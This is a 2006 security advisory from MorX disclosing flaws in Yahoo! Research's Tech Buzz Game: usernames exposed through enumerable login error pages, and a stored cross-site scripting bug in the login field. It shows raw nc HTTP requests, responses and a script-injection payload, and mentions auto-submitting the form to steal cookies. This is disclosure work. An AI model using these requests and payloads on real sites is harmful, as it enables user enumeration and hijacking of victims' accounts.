Title: Yahoo! Research Multiple vulnerabilites

Authors: Simo64 and Simo Ben youssef
Contacts : <simo64_at_morx_org> / <simo_at_morx_org>
Discovered: 02 Aout 2006
Published:  17 Aout 2006
MorX Security Research Team
Original Advisory:
http://www.morx.org/YahooResearchMultiple.txt
http://www.morx.org

Service/Product: The Tech Buzz Game

Vendors: Yahoo! Research and O'Reilly Media

Vulnerability: Cross Site Scripting / Users Information Disclosure

Severity: Law/Medium

Tested on: Microsoft IE 6.0 firefox 1.5 and Opera
           (should work on all browsers)


Description:

The Tech Buzz Game is a fledgling research project and demo, rather than a
full-fledged Yahoo! product, and it's a product of Yahoo! Research and
O'Reilly Media. The marketplace software is powered by Newsfutures. Buzz
scores are powered by Yahoo! Search technology and Yahoo! Search Web
Services. The buzz scoring methodology was originally developed for the
Yahoo! Buzz Index, which tracks web search spikes and trends

for more details, visit:

http://buzz.research.yahoo.com/dm/info/about.html

Details:

1- Usernames disclosure

the login2.html script is writting in a way to store users error
information in login.html. if a user fails to sign in to the game, the
error returned by login2.html with the username will be stored in
login.html. login.html assign each request with an EID numerical value, in
fact those information are accessible to anyone thru HTTP

from login.htm source code

<td valign="top" align="center" >
      <form action=hlogin2.html method=post>
      <input type=hidden name=cmd value=Domain.login>
      <input type=hidden name=error.page value=login.html> <--- stores
informations back in login.html

Example:

C:\>nc buzz.research.yahoo.com 80
GET /dm/login/login.html?eid=100 HTTP/1.1
Host: 127.0.0.1
Connection: Closed

HTTP/1.1 200 OK
Date: Thu, 17 Aug 2006 14:40:46 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7
Transfer-Encoding: chunked
Content-Type: text/html

1d84
--------------------- Scroll down ------------------------
        <td align="left" scope="col">Username:</td>
        <td align="left" scope="col"><input type="text" name="login"
value='wil*******' /></td> <--- a previously stored yahoo ID

<td class="error" align="left" scope="col"></td>

PoC:

http://buzz.research.yahoo.com/dm/login/login.html?eid=[some-random-numbers]

2- Permanent Cross Site Scripting:

login2.html doesnt only store informations and make them accessible
publicly thru login.html but also it fails to properly sanitize
user-supplied input when passed thru the variable "login". after
successful script injection the input will be stored in login.html with a
specific EID

example:

C:\>nc buzz.research.yahoo.com 80
POST /dm/login/login2.html HTTP/1.1
Host: 127.0.0.1
Content-Length: 78
Connection: Closed

cmd=Domain.login&error.page=login.html&login=''><script>alert("a")</script>&pw=a

HTTP/1.1 302 Found
Date: Thu, 17 Aug 2006 15:10:47 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7a
Location: /dm/login/login.html?eid=182
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

120
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="/dm/login/login.html?eid=182">here</A>.<P>
<HR>

ok now lets get login.html?eid=182 to see if our script was filtered or no

C:\>nc buzz.research.yahoo.com 80
GET /dm/login/login.html?eid=182 HTTP/1.1
Host: 127.0.0.1
Connection: Closed

HTTP/1.1 200 OK
Date: Thu, 17 Aug 2006 13:14:18 GMT
Server: Apache/1.3.33 (Unix) mod_ssl/2.8.22 OpenSSL/0.9.7a
Transfer-Encoding: chunked
Content-Type: text/html

1d98




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
--------------------------Scroll Down ------------------------

Sorry, login failed.</td>
          </tr>

      <tr>
        <td scope="col" align="left" colspan="4">&nbsp;</td>
      </tr>
      <tr>
        <td scope="col" align="left">&nbsp;</td>
        <td align="left" scope="col">Username:</td>
        <td align="left" scope="col"><input type="text" name="login"
value='''><script>alert("a")</script>' /></td> <--- not filtred

PoC:

http://www.morx.org/yahooXSSinject.html

Note: the form will need the user to click to submit, an attacker may use
a form which will auto-submit the js, using for example the onload
attribute

Impact:

an attacker can exploit the vulnerable script to have arbitrary script
code executed in the browser of an authentified yahoo user in the context
of the vulnerable yahoo website. resulting in the theft of cookie-based
authentication giving the attacker full access to the victim's accounts
(email box, etc) as well as other type of attacks.

workaround:

avoid clicking on links while being signed in yahoo

Disclaimer:

this entire document is for eductional, testing and demonstrating purpose
only. Modification use and/or publishing this information is entirely on
your OWN risk. The information provided in this advisory is to be
used/tested on your OWN machine/Account. I cannot be held responsible for
any of the above.